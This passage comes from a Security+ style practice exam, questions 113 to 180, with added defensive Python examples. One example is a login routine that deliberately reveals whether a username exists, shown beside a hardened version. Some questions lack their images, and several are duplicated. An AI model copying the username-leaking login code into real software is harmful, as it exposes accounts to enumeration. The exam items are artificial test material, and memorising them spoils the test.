A replay attack is being conducted against the application.

B.

An injection attack is being conducted against a user authentication system.

C.

A service account password may have been changed, resulting in continuous failed logins within the application.

D.

A credentialed vulnerability scanner attack is testing several CVEs against the application.

Question 113

An attacker is attempting to harvest user credentials on a client's website. A security analyst notices multiple attempts of random usernames and passwords. When the analyst types in a random username and password, the logon screen displays the following message:

The username you entered does not exist.

Which of the following should the analyst recommend be enabled?

Options:

A.

Input validation

B.

Obfuscation

C.

Error handling

D.

Username lockout
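The message in the question tells the attacker which usernames are valid, which turns password guessing into the much cheaper job of harvesting a list of real accounts first. As an added example, not from the original page, the following Python code places a login routine with that leak next to a hardened version that returns one generic message and does the same amount of password-hashing work whether or not the account exists, so neither the response text nor the response time reveals anything. The user store, the hashing parameters and the usernames are assumptions made for the example.

```python
import hashlib
import hmac
import os
import secrets

# Assumed parameters for the example; a real deployment would tune these.
PBKDF2_ITERATIONS = 100_000
GENERIC_ERROR = "Invalid username or password."


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)


def make_user_store(credentials: dict) -> dict:
    """Build {username: (salt, password_hash)} from a constructed credential list."""
    store = {}
    for username, password in credentials.items():
        salt = os.urandom(16)
        store[username] = (salt, _hash_password(password, salt))
    return store


# A dummy record so that a lookup of an unknown user still costs one PBKDF2 run.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _hash_password(secrets.token_hex(16), _DUMMY_SALT)


def login_vulnerable(store, username, password):
    """Leaks account existence: the message differs for unknown user vs. wrong password,
    and an unknown user is answered without hashing (a timing side channel as well)."""
    if username not in store:
        return False, "The username you entered does not exist."
    salt, expected = store[username]
    if not hmac.compare_digest(_hash_password(password, salt), expected):
        return False, "The password you entered is incorrect."
    return True, "Login successful."


def login_hardened(store, username, password):
    """One generic message and the same hashing work on every failure path."""
    salt, expected = store.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    candidate = _hash_password(password, salt)
    if username in store and hmac.compare_digest(candidate, expected):
        return True, "Login successful."
    return False, GENERIC_ERROR


if __name__ == "__main__":
    users = make_user_store({"alice": "correct horse battery staple"})
    for fn in (login_vulnerable, login_hardened):
        print(fn.__name__, fn(users, "mallory", "x")[1], "|", fn(users, "alice", "x")[1])
```

Generic error handling alone does not stop the guessing; it removes the free information. Rate limiting and lockout are still needed against the attempts themselves.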

Question 114

Which of the following is an administrative control that would be most effective to reduce the occurrence of malware execution?

Options:

A.

Security awareness training

B.

Frequency of NIDS updates

C.

Change control procedures

D.

EDR reporting cycle

Question 115

An organization wants to ensure that proprietary information is not inadvertently exposed during facility tours. Which of the following would the organization implement to mitigate this risk?

Options:

A.

Clean desk policy

B.

Background checks

C.

Non-disclosure agreements

D.

Social media analysis

Question 116

Server administrators want to configure a cloud solution so that computing memory and processor usage are maximized most efficiently across a number of virtual servers. They also need to avoid potential denial-of-service situations caused by a lack of availability. Which of the following should administrators configure to maximize system availability while efficiently utilizing available computing power?

Options:

A.

Dynamic resource allocation

B.

High availability

C.

Segmentation

D.

Container security

Question 117

A security architect at a large, multinational organization is concerned about the complexities and overhead of managing multiple encryption keys securely in a multicloud provider environment. The security architect is looking for a solution with reduced latency to allow the incorporation of the organization's existing keys and to maintain consistent, centralized control and management regardless of the data location. Which of the following would best meet the architect's objectives?

Options:

A.

Trusted Platform Module

B.

IaaS

C.

HSMaaS

D.

PaaS

Question 118

A user's login credentials were recently compromised. During the investigation, the security analyst determined the user input credentials into a pop-up window when prompted to confirm the username and password. However, the trusted website does not use a pop-up for entering user credentials. Which of the following attacks occurred?

Options:

A.

Cross-site scripting

B.

SQL injection

C.

DNS poisoning

D.

Certificate forgery

Question 119

Which of the following scenarios best describes a risk reduction technique?

Options:

A.

A security control objective cannot be met through a technical change, so the company purchases insurance and is no longer concerned about losses from data breaches

B.

A security control objective cannot be met through a technical change, so the company implements a policy to train users on a more secure method of operation

C.

A security control objective cannot be met through a technical change, so the company performs regular audits to determine if violations have occurred

D.

A security control objective cannot be met through a technical change, so the Chief Information Officer decides to sign off on the risk.

Question 120

A routine audit of medical billing claims revealed that several claims were submitted without the subscriber's knowledge. A review of the audit logs for the medical billing company's system indicated a company employee downloaded customer records and adjusted the direct deposit information to a personal bank account. Which of the following does this action describe?

Options:

A.

Insider threat

B.

Social engineering

C.

Third-party risk

D.

Data breach

Question 121

A security engineer must deploy two wireless routers in an office suite. Other tenants in the office building should not be able to connect to this wireless network. Which of the following protocols should the engineer implement to ensure the strongest encryption?

Options:

A.

WPS

B.

WPA2

C.

WAP

D.

HTTPS

Question 122

A security analyst discovers several .jpg photos from a cellular phone during a forensics investigation involving a compromised system. The analyst runs a forensics tool to gather file metadata. Which of the following would be part of the images if all the metadata is still intact?

Options:

A.

The GPS location

B.

When the file was deleted

C.

The total number of print jobs

D.

The number of copies made

Question 123

During a recent penetration test, a tester plugged a laptop into an Ethernet port in an unoccupied conference room and obtained a valid IP address. Which of the following would have best prevented this avenue of attack?

Options:

A.

Enabling MAC address filtering

B.

Moving printers inside a firewall

C.

Implementing 802.1X

D.

Using network port security

Question 124

An analyst is concerned about data leaks and wants to restrict access to internet services to authorized users only. The analyst also wants to control the actions each user can perform on each service. Which of the following would be the best technology for the analyst to consider implementing?

Options:

A.

DLP

B.

VPC

C.

CASB

D.

Content filtering

Question 125

Which of the following describes the ability of code to target a hypervisor from inside a guest OS?

Options:

A.

Fog computing

B.

VM escape

C.

Software-defined networking

D.

Image forgery

E.

Container breakout

Question 126

A security analyst has been reading about a newly discovered cyberattack from a known threat actor. Which of the following would best support the analyst's review of the tactics, techniques, and procedures the threat actor was observed using in previous campaigns?

Options:

A.

Security research publications

B.

The MITRE ATT&CK framework

C.

The Diamond Model of Intrusion Analysis

D.

The Cyber Kill Chain

Question 127

A cybersecurity analyst reviews the log files from a web server and sees a series of files that indicate a directory traversal attack has occurred. Which of the following is the analyst most likely seeing?

Options:

A.

B.

C.

D.

Question 128

The most recent vulnerability scan flagged the domain controller with a critical vulnerability. The systems administrator researched the vulnerability and discovered the domain controller does not run the associated application with the vulnerability. Which of the following steps should the administrator take next?

Options:

A.

Ensure the scan engine is configured correctly.

B.

Apply a patch to the domain controller.

C.

Research the CVE.

D.

Document this as a false positive.

Question 129

Which of the following is an example of risk avoidance?

Options:

A.

Installing security updates directly in production to expedite vulnerability fixes

B.

Buying insurance to prepare for financial loss associated with exploits

C.

Not installing new software to prevent compatibility errors

D.

Not taking preventive measures to stop the theft of equipment

Question 130

A security administrator is trying to determine whether a server is vulnerable to a range of attacks. After using a tool, the administrator obtains the following output.


Which of the following attacks was successfully implemented based on the output?

Options:

A.

Memory leak

B.

Race condition

C.

SQL injection

D.

Directory traversal

Question 131

Which of the following teams combines both offensive and defensive testing techniques to protect an organization's critical systems?

Options:

A.

Red

B.

Blue

C.

Purple

D.

Yellow

Question 132

An attacker is trying to gain access by installing malware on a website that is known to be visited by the target victims. Which of the following is the attacker most likely attempting?

Options:

A.

A spear-phishing attack

B.

A watering-hole attack

C.

Typo squatting

D.

A phishing attack

Question 133

Which of the following best describes the risk that is present once mitigations are applied?

Options:

A.

Control risk

B.

Residual risk

C.

Inherent risk

D.

Risk awareness

Question 134

Which of the following security controls is used to isolate a section of the network and its externally available resources from the internal corporate network in order to reduce the number of possible attacks?

Options:

A.

Faraday cages

B.

Air gap

C.

Vaulting

D.

Proximity readers

Question 135

Which of the following is used to validate a certificate when it is presented to a user?

Options:

A.

OCSP

B.

CSR

C.

CA

D.

CRC

Question 136

A building manager is concerned about people going in and out of the office during non-working hours. Which of the following physical security controls would provide the best solution?

Options:

A.

Cameras

B.

Badges

C.

Locks

D.

Bollards

Question 137

A security engineer is building a file transfer solution to send files to a business partner. The users would like to drop off the files in a specific directory and have the server send the file to the business partner. The connection to the business partner is over the internet and needs to be secure. Which of the following can be used?

Options:

A.

SMIME

B.

LDAPS

C.

SSH

D.

SRTP

Question 138

Which of the following best ensures minimal downtime for organizations with critical computing equipment located in earthquake-prone areas?

Options:

A.

Generators and UPS

B.

Off-site replication

C.

Additional warm site

D.

Local

Question 139

A security architect is required to deploy to conference rooms some workstations that will allow sensitive data to be displayed on large screens. Due to the nature of the data, it cannot be stored in the conference rooms. The file share is located in a local data center. Which of the following should the security architect recommend to best meet the requirement?

Options:

A.

Fog computing and KVMs

B.

VDI and thin clients

C.

Private cloud and DLP

D.

Full drive encryption and thick clients

Question 140

A user enters a password to log in to a workstation and is then prompted to enter an authentication code. Which of the following MFA factors or attributes are being utilized in the authentication process? (Select two).

Options:

A.

Something you know

B.

Something you have

C.

Somewhere you are

D.

Someone you know

E.

Something you are

F.

Something you can do

Question 141

Cloud security engineers are planning to allow and deny access to specific features in order to increase data security. Which of the following cloud features is the most appropriate to ensure access is granted properly?

Options:

A.

API integrations

B.

Auditing

C.

Resource policies

D.

Virtual networks

Question 142

A security analyst is investigating what appears to be unauthorized access to a corporate web application. The security analyst reviews the web server logs and finds the following entries:


Which of the following password attacks is taking place?

Options:

A.

Dictionary

B.

Brute-force

C.

Rainbow table

D.

Spraying
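The two log-based questions above (Question 87, where the missing control is account lockout, and Question 142, where the analyst must tell brute force from spraying) both come down to counting failures per source and per account. As an added example, not part of the original page, the following Python code parses authentication log lines, labels a source as brute-force when many failures hit one account and as spraying when a few failures each hit many accounts, and applies a lockout policy to the same data. The log lines are constructed for the example and are not the page's missing screenshots; the log format and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log format for the example: ISO timestamp, source IP, username, outcome.
LOG_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$"
)

# Constructed sample logs (not the page's screenshots): a brute-force run that
# finally succeeds against one account, then a spray of one guess per account.
BRUTE_FORCE_LOG = [
    f"2023-05-01T10:00:{i:02d} src=203.0.113.5 user=admin "
    f"result={'OK' if i == 11 else 'FAIL'}"
    for i in range(12)
]
SPRAY_LOG = [
    f"2023-05-01T11:{i:02d}:00 src=198.51.100.7 user=user{i:02d} result=FAIL"
    for i in range(20)
]


def parse(lines):
    """Return (timestamp, src, user, result) tuples, skipping malformed lines."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["src"], m["user"], m["result"]))
    return events


def classify(lines, min_attempts=5):
    """Label each source IP as 'brute-force', 'spraying' or 'normal' from its failures."""
    per_src = defaultdict(lambda: defaultdict(int))
    for _, src, user, result in parse(lines):
        if result == "FAIL":
            per_src[src][user] += 1
    verdicts = {}
    for src, users in per_src.items():
        total = sum(users.values())
        if total < min_attempts:
            verdicts[src] = "normal"
        elif max(users.values()) >= min_attempts:
            verdicts[src] = "brute-force"   # many guesses against the same account
        else:
            verdicts[src] = "spraying"      # a few guesses each across many accounts
    return verdicts


def locked_accounts(lines, threshold=5, window=timedelta(minutes=10)):
    """Apply an account-lockout policy: `threshold` failures inside `window` lock the user."""
    recent = defaultdict(list)
    locked = set()
    for ts, _, user, result in sorted(parse(lines)):
        if result != "FAIL":
            continue
        recent[user] = [t for t in recent[user] if ts - t <= window] + [ts]
        if len(recent[user]) >= threshold:
            locked.add(user)
    return locked


if __name__ == "__main__":
    for name, log in (("brute force", BRUTE_FORCE_LOG), ("spray", SPRAY_LOG)):
        print(name, classify(log), "locked:", locked_accounts(log) or "none")
```

The second function shows the caveat a practitioner would raise when recommending lockout: it locks the brute-forced account after the fifth failure, but the spray never trips it because no single account exceeds the threshold. Detecting spraying needs the per-source view in classify(), not a per-account counter.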

Question 143

A newly purchased corporate WAP needs to be configured in the MOST secure manner possible.

INSTRUCTIONS

Please click on the below items on the network diagram and configure them accordingly:

  • WAP
  • DHCP Server
  • AAA Server
  • Wireless Controller
  • LDAP Server

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.


Options:

Question 144

A company's help desk has received calls about the wireless network being down and users being unable to connect to it. The network administrator says all access points are up and running. One of the help desk technicians notices the affected users are working in a building near the parking lot. Which of the following is the most likely reason for the outage?

Options:

A.

Someone near the building is jamming the signal

B.

A user has set up a rogue access point near the building

C.

Someone set up an evil twin access point in the affected area.

D.

The APs in the affected area have been unplugged from the network

Question 145

A security analyst is looking for a solution to help communicate to the leadership team the severity levels of the organization's vulnerabilities. Which of the following would best meet this need?

Options:

A.

CVE

B.

SIEM

C.

SOAR

D.

CVSS

Question 146

Which of the following supplies non-repudiation during a forensics investigation?

Options:

A.

Dumping volatile memory contents first

B.

Duplicating a drive with dd

C.

Using a SHA-2 signature of a drive image

D.

Logging everyone in contact with evidence

E.

Encrypting sensitive data

Question 147

Which of the following supplies non-repudiation during a forensics investigation?

Options:

A.

Dumping volatile memory contents first

B.

Duplicating a drive with dd

C.

Using a SHA-2 signature of a drive image

D.

Logging everyone in contact with evidence

E.

Encrypting sensitive data

Question 148

During a recent security assessment, a vulnerability was found in a common OS. The OS vendor was unaware of the issue and promised to release a patch within the next quarter. Which of the following best describes this type of vulnerability?

Options:

A.

Legacy operating system

B.

Weak configuration

C.

Zero day

D.

Supply chain

Question 149

A customer called a company's security team to report that all invoices the customer has received over the last five days from the company appear to have fraudulent banking details. An investigation into the matter reveals the following:

• The manager of the accounts payable department is using the same password across multiple external websites and the corporate account

• One of the websites the manager used recently experienced a data breach.

• The manager's corporate email account was successfully accessed in the last five days by an IP address located in a foreign country.

Which of the following attacks has most likely been used to compromise the manager's corporate account?

Options:

A.

Remote access Trojan

B.

Brute-force

C.

Dictionary

D.

Credential stuffing

E.

Password spraying

Question 150

Which of the following are common VoIP-associated vulnerabilities? (Select two).

Options:

A.

SPIM

B.

Vishing

C.

VLAN hopping

D.

Phishing

E.

DHCP snooping

F.

Tailgating

Question 151

Which of the following automation use cases would best enhance the security posture of an organization by rapidly updating permissions when employees leave a company or change job roles internally?

Options:

A.

Provisioning resources

B.

Disabling access

C.

APIs

D.

Escalating permission requests

Question 152

Which of the following is the best method for ensuring non-repudiation?

Options:

A.

SSO

B.

Digital certificate

C.

Token

D.

SSH key

Question 153

An information security officer at a credit card transaction company is conducting a framework-mapping exercise with the internal controls. The company recently established a new office in Europe. To which of the following frameworks should the security officer map the existing controls? (Select two).

Options:

A.

ISO

B.

PCI DSS

C.

SOC

D.

GDPR

E.

CSA

F.

NIST

Question 154

A security analyst discovers that one of the web APIs is being abused by an unknown third party. Logs indicate that the third party is attempting to manipulate the parameters being passed to the API endpoint. Which of the following solutions would best help to protect against the attack?

Options:

A.

DLP

B.

SIEM

C.

NIDS

D.

WAF

Question 155

A security professional wants to enhance the protection of a critical environment that is used to store and manage a company's encryption keys. The selected technology should be tamper resistant. Which of the following should the security professional implement to achieve the goal?

Options:

A.

DLP

B.

HSM

C.

CA

D.

FIM

Question 156

During a security incident, the security operations team identified sustained network traffic from a malicious IP address: 10.1.4.9. A security analyst is creating an inbound firewall rule to block the IP address from accessing the organization's network. Which of the following fulfills this request?

Options:

A.

access-list inbound deny ip source 0.0.0.0/0 destination 10.1.4.9/32

B.

access-list inbound deny ip source 10.1.4.9/32 destination 0.0.0.0/0

C.

access-list inbound permit ip source 10.1.4.9/32 destination 0.0.0.0/0

D.

access-list inbound permit ip source 0.0.0.0/0 destination 10.1.4.9/32

Question 157

A company is developing a business continuity strategy and needs to determine how many staff members would be required to sustain the business in the case of a disruption.

Which of the following best describes this step?

Options:

A.

Capacity planning

B.

Redundancy

C.

Geographic dispersion

D.

Tabletop exercise

Question 158

A company's help desk has received calls about the wireless network being down and users being unable to connect to it. The network administrator says all access points are up and running. One of the help desk technicians notices the affected users are working in a building near the parking lot. Which of the following is the most likely reason for the outage?

Options:

A.

Someone near the building is jamming the signal.

B.

A user has set up a rogue access point near the building.

C.

Someone set up an evil twin access point in the affected area.

D.

The APs in the affected area have been unplugged from the network.

Question 159

A security analyst receives an alert from the company's SIEM that anomalous activity is coming from a local source IP address of 192.168.34.26. The Chief Information Security Officer asks the analyst to block the originating source. Several days later, another employee opens an internal ticket stating that vulnerability scans are no longer being performed properly. The IP address the employee provides is 192.168.34.26. Which of the following describes this type of alert?

Options:

A.

True positive

B.

True negative

C.

False positive

D.

False negative

Question 160

A security administrator needs to inspect in-transit files on the enterprise network to search for PII, credit card data, and classification words. Which of the following would be the best to use?

Options:

A.

IDS solution

B.

EDR solution

C.

HIPS software solution

D.

Network DLP solution

Question 161

A company wants to build a new website to sell products online. The website will host a storefront application that allows visitors to add products to a shopping cart and pay for products using a credit card. Which of the following protocols would be most secure to implement?

Options:

A.

SSL

B.

SFTP

C.

SNMP

D.

TLS

Question 162

A company's help desk received several AV alerts indicating Mimikatz attempted to run on the remote systems. Several users also reported that the new company flash drives they picked up in the break room only have 512KB of storage. Which of the following is most likely the cause?

Options:

A.

The GPO prevents the use of flash drives, which triggers a false positive AV indication and restricts the drives to only 512KB of storage

B.

The new flash drives need a driver that is being blocked by the AV software because the flash drives are not on the application's allow list, temporarily restricting the drives to 512KB of storage.

C.

The new flash drives are incorrectly partitioned, and the systems are automatically trying to use an unapproved application to repartition the drives.

D.

The GPO blocking the flash drives is being bypassed by a malicious flash drive that is attempting to harvest plaintext credentials from memory.

Question 163

An organization experiences a cybersecurity incident involving a command-and-control server. Which of the following logs should be analyzed to identify the impacted host? (Select two).

Options:

A.

Application

B.

Authentication

C.

Error

D.

Network

E.

Firewall

F.

System

Question 164

Which of the following will increase cryptographic security?

Options:

A.

High data entropy

B.

Algorithms that require less computing power

C.

Longer key longevity

D.

Hashing

Question 165

A web server has been compromised due to a ransomware attack. Further investigation reveals the ransomware has been in the server for the past 72 hours. The systems administrator needs to get the services back up as soon as possible. Which of the following should the administrator use to restore services to a secure state?

Options:

A.

The last incremental backup that was conducted 72 hours ago

B.

The last known-good configuration stored by the operating system

C.

The last full backup that was conducted seven days ago

D.

The baseline OS configuration

Question 166

A network manager is concerned that business may be negatively impacted if the firewall in its data center goes offline. The manager would like to implement a high availability pair to:

Options:

A.

decrease the mean time between failures.

B.

remove the single point of failure.

C.

cut down the mean time to repair

D.

reduce the recovery time objective

Question 167

Law enforcement officials sent a company a notification that states electronically stored information and paper documents cannot be destroyed. Which of the following explains this process?

Options:

A.

Data breach notification

B.

Accountability

C.

Legal hold

D.

Chain of custody

Question 168

Security analysts notice a server login from a user who has been on vacation for two weeks. The analysts confirm that the user did not log in to the system while on vacation. After reviewing a packet capture, the analysts notice the following:

Which of the following occurred?

Options:

A.

A buffer overflow was exploited to gain unauthorized access.

B.

The user's account was compromised, and an attacker changed the login credentials.

C.

An attacker used a pass-the-hash attack to gain access.

D.

An insider threat with the username logged in to the account.

Question 169

An organization routes all of its traffic through a VPN. Most users are remote and connect into a corporate data center that houses confidential information. There is a firewall at the internet border, followed by a DLP appliance, the VPN server and the data center itself. Which of the following is the weakest design element?

Options:

A.

The DLP appliance should be integrated into a NGFW.

B.

Split-tunnel connections can negatively impact the DLP appliance's performance.

C.

Encrypted VPN traffic will not be inspected when entering or leaving the network.

D.

Adding two hops in the VPN tunnel may slow down remote connections

Question 170

An administrator is configuring a firewall rule set for a subnet to only access DHCP, web pages, and SFTP, and to specifically block FTP. Which of the following would BEST accomplish this goal?

Options:

A.

[Permission Source Destination Port]
Allow: Any Any 80
Allow: Any Any 443
Allow: Any Any 67
Allow: Any Any 68
Allow: Any Any 22
Deny: Any Any 21
Deny: Any Any

B.

[Permission Source Destination Port]
Allow: Any Any 80
Allow: Any Any 443
Allow: Any Any 67
Allow: Any Any 68
Deny: Any Any 22
Allow: Any Any 21
Deny: Any Any

C.

[Permission Source Destination Port]
Allow: Any Any 80
Allow: Any Any 443
Allow: Any Any 22
Deny: Any Any 67
Deny: Any Any 68
Deny: Any Any 21
Allow: Any Any

D.

[Permission Source Destination Port]
Allow: Any Any 80
Allow: Any Any 443
Deny: Any Any 67
Allow: Any Any 68
Allow: Any Any 22
Allow: Any Any 21
Allow: Any Any

Question 171

Select the appropriate attack and remediation from each drop-down list to label the corresponding attack with its remediation.

INSTRUCTIONS

Not all attacks and remediation actions will be used.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Question 172

A company wants the ability to restrict web access and monitor the websites that employees visit. Which of the following would best meet these requirements?

Options:

A.

Internet Proxy

B.

VPN

C.

WAF

D.

Firewall

Question 173

An annual information security audit has revealed that several OS-level configurations are not in compliance due to outdated hardening standards the company is using. Which of the following would be best to use to update and reconfigure the OS-level security configurations?

Options:

A.

CIS benchmarks

B.

GDPR guidance

C.

Regional regulations

D.

ISO 27001 standards

Question 174

An audit identified PII being utilized in the development environment of a critical application. The Chief Privacy Officer (CPO) is adamant that this data must be removed; however, the developers are concerned that without real data they cannot perform functionality tests and search for specific data. Which of the following should a security professional implement to best satisfy both the CPO's and the development team's requirements?

Options:

A.

Data purge

B.

Data encryption

C.

Data masking

D.

Data tokenization

Question 175

Which of the following tools can assist with detecting an employee who has accidentally emailed a file containing a customer's PII?

Options:

A.

SCAP

B.

NetFlow

C.

Antivirus

D.

DLP

Question 176

A technician is setting up a new firewall on a network segment to allow web traffic to the internet while hardening the network. After the firewall is configured, users receive errors stating the website could not be located. Which of the following would best correct the issue?

Options:

A.

Setting an explicit deny to all traffic using port 80 instead of 443

B.

Moving the implicit deny from the bottom of the rule set to the top

C.

Configuring the first line in the rule set to allow all traffic

D.

Ensuring that port 53 has been explicitly allowed in the rule set
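
Worked example covering both the rule-set comparison in Question 170 and the missing-DNS symptom in Question 176. This is an added example, not exam material: it encodes the four rule sets exactly as the options list them, evaluates them with a stateless first-match model that ends in an implicit deny (an assumption about the firewall; most products work this way), and then asks each set whether it also lets DNS (port 53) through. The service names and the REQUIRED/FORBIDDEN tables are the example's own reading of the question text.

```python
"""First-match evaluation of the rule sets from Question 170, extended with
the DNS check behind Question 176.

Added example, not exam material. Only destination ports are matched,
since every rule in the options uses Any for source and destination.
"""
from typing import NamedTuple, Optional


class Rule(NamedTuple):
    action: str          # "Allow" or "Deny"
    src: str             # "Any" in all of the exam's rules
    dst: str
    port: Optional[int]  # None = any port (the trailing "Deny: Any Any")


def parse_rules(text):
    """Parse lines of the form 'Allow: Any Any 80' or 'Deny: Any Any'."""
    rules = []
    for line in text.strip().splitlines():
        action, rest = line.split(":", 1)
        fields = rest.split()
        port = int(fields[2]) if len(fields) > 2 else None
        rules.append(Rule(action.strip(), fields[0], fields[1], port))
    return rules


def evaluate(rules, dport, implicit="Deny"):
    """Action of the first rule whose port matches; 'implicit' models the
    default applied when nothing in the rule set matched (assumption)."""
    for r in rules:
        if r.port is None or r.port == dport:
            return r.action
    return implicit


# The four rule sets exactly as listed in the question's options.
OPTION_A = parse_rules("""
Allow: Any Any 80
Allow: Any Any 443
Allow: Any Any 67
Allow: Any Any 68
Allow: Any Any 22
Deny: Any Any 21
Deny: Any Any""")
OPTION_B = parse_rules("""
Allow: Any Any 80
Allow: Any Any 443
Allow: Any Any 67
Allow: Any Any 68
Deny: Any Any 22
Allow: Any Any 21
Deny: Any Any""")
OPTION_C = parse_rules("""
Allow: Any Any 80
Allow: Any Any 443
Allow: Any Any 22
Deny: Any Any 67
Deny: Any Any 68
Deny: Any Any 21
Allow: Any Any""")
OPTION_D = parse_rules("""
Allow: Any Any 80
Allow: Any Any 443
Deny: Any Any 67
Allow: Any Any 68
Allow: Any Any 22
Allow: Any Any 21
Allow: Any Any""")

# What the question requires: DHCP (67/68), web (80/443), SFTP over SSH (22); no FTP (21).
REQUIRED = {"HTTP": 80, "HTTPS": 443, "DHCP server": 67, "DHCP client": 68, "SFTP": 22}
FORBIDDEN = {"FTP": 21}


def meets_goal(rules):
    """True when every required service passes and every forbidden one is denied."""
    return (all(evaluate(rules, p) == "Allow" for p in REQUIRED.values())
            and all(evaluate(rules, p) == "Deny" for p in FORBIDDEN.values()))


def blocked(rules, services):
    """Names of the given services that the rule set does not allow."""
    return [name for name, p in services.items() if evaluate(rules, p) != "Allow"]


if __name__ == "__main__":
    for name, rs in (("A", OPTION_A), ("B", OPTION_B), ("C", OPTION_C), ("D", OPTION_D)):
        print(name, "meets goal:", meets_goal(rs), "blocked:", blocked(rs, REQUIRED))
    # Question 176's symptom: 80/443 are open, but name resolution (53) is not.
    print("DNS blocked in option A:", blocked(OPTION_A, {"DNS": 53}))
```

Two practitioner caveats the exam wording skips: option A is the only set that satisfies the stated goal, yet it still has no rule for UDP/TCP 53, so clients on that subnet could reach web servers by IP but not by name, which is exactly the "website could not be located" error in Question 176. Denying port 21 only blocks the FTP control channel; that is enough to stop sessions from being set up, but it is the control channel, not the high-numbered data ports, that the rule acts on.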

Question 177

A company is auditing the manner in which its European customers’ personal information is handled. Which of the following should the company consult?

Options:

A.

GDPR

B.

ISO

C.

NIST

D.

PCI DSS

Question 178

To reduce and limit software and infrastructure costs, the Chief Information Officer has requested to move email services to the cloud. The cloud provider and the organization must have security controls to protect sensitive data. Which of the following cloud services would best accommodate the request?

Options:

A.

IaaS

B.

PaaS

C.

DaaS

D.

SaaS

Question 179

An organization has hired a security analyst to perform a penetration test. The analyst captures 1Gb worth of inbound network traffic to the server and transfers the pcap back to the machine for analysis. Which of the following tools should the analyst use to further review the pcap?

Options:

A.

Nmap

B.

CURL

C.

Ncat

D.

Wireshark
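
Worked example of what a pcap actually contains, added here and not part of the exam material: the classic libpcap file format Wireshark opens is a 24-byte global header followed by per-packet records, each with its own 16-byte header. The block below builds a tiny three-packet capture in memory (constructed frames with TEST-NET addresses and zero checksums) and parses it back into TCP conversations. It assumes the little-endian 0xa1b2c3d4 magic, link type 1 (Ethernet), no VLAN tags and IPv4 headers without options; a real capture may use the big-endian or nanosecond magic, which this reader rejects rather than misparses.

```python
"""Minimal reader for the classic libpcap (.pcap) format.

Added example, not exam material. Builds a constructed capture and parses
the Ethernet/IPv4/TCP headers to list conversations, which is the first
thing an analyst does with a large inbound capture before opening it in
Wireshark.
"""
import socket
import struct

PCAP_MAGIC = 0xA1B2C3D4      # little-endian, microsecond timestamps
LINKTYPE_ETHERNET = 1


def build_tcp_packet(src_ip, dst_ip, sport, dport, payload=b""):
    """Construct an Ethernet/IPv4/TCP SYN frame (checksums left zero;
    Wireshark would flag them, which does not matter for parsing)."""
    eth = b"\x00" * 12 + b"\x08\x00"          # dst/src MAC, EtherType IPv4
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x02, 65535, 0, 0)
    total_len = 20 + len(tcp) + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return eth + ip + tcp + payload


def build_pcap(frames, t0=1709287200):
    """Serialize frames into pcap bytes: global header, then one record each.
    t0 is an arbitrary constructed epoch timestamp; packets are 1 s apart."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", t0 + i, 0, len(frame), len(frame))
        out += frame
    return out


def parse_pcap(data):
    """Yield (timestamp, src_ip, sport, dst_ip, dport) for each TCP/IPv4 packet."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic != PCAP_MAGIC:
        raise ValueError("unsupported pcap magic / byte order: %#x" % magic)
    linktype, = struct.unpack_from("<I", data, 20)
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet link type is handled here")
    off = 24
    while off + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack_from("<IIII", data, off)
        off += 16
        frame = data[off:off + incl_len]
        off += incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue                                   # truncated or not IPv4
        ihl = (frame[14] & 0x0F) * 4                   # IPv4 header length
        proto = frame[14 + 9]
        src = socket.inet_ntoa(frame[14 + 12:14 + 16])
        dst = socket.inet_ntoa(frame[14 + 16:14 + 20])
        if proto != 6:
            continue                                   # not TCP
        sport, dport = struct.unpack_from("!HH", frame, 14 + ihl)
        yield (ts_sec + ts_usec / 1e6, src, sport, dst, dport)


def conversations(data):
    """Count packets per (src, sport, dst, dport) tuple."""
    counts = {}
    for _, src, sport, dst, dport in parse_pcap(data):
        key = (src, sport, dst, dport)
        counts[key] = counts.get(key, 0) + 1
    return counts


# Constructed sample capture: two packets of one flow, one of another.
SAMPLE_PCAP = build_pcap([
    build_tcp_packet("198.51.100.5", "192.0.2.10", 51000, 443),
    build_tcp_packet("198.51.100.5", "192.0.2.10", 51000, 443, b"GET"),
    build_tcp_packet("203.0.113.9", "192.0.2.10", 40001, 22),
])

if __name__ == "__main__":
    for key, n in conversations(SAMPLE_PCAP).items():
        print(key, n)
```

Nmap generates traffic, cURL and Ncat open connections; none of them reads a capture file. For a 1Gb capture, summarizing flows this way (or with Wireshark's Conversations window) before decoding individual packets is what makes the review tractable.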

Question 180

A cybersecurity administrator is using iptables as an enterprise firewall. The administrator created some rules, but the network now seems to be unresponsive. All connections are being dropped by the firewall. Which of the following would be the best option to remove the rules?

Options:

A.

# iptables -t mangle -X

B.

# iptables -F

C.

# iptables -Z

D.

# iptables -P INPUT -j DROP
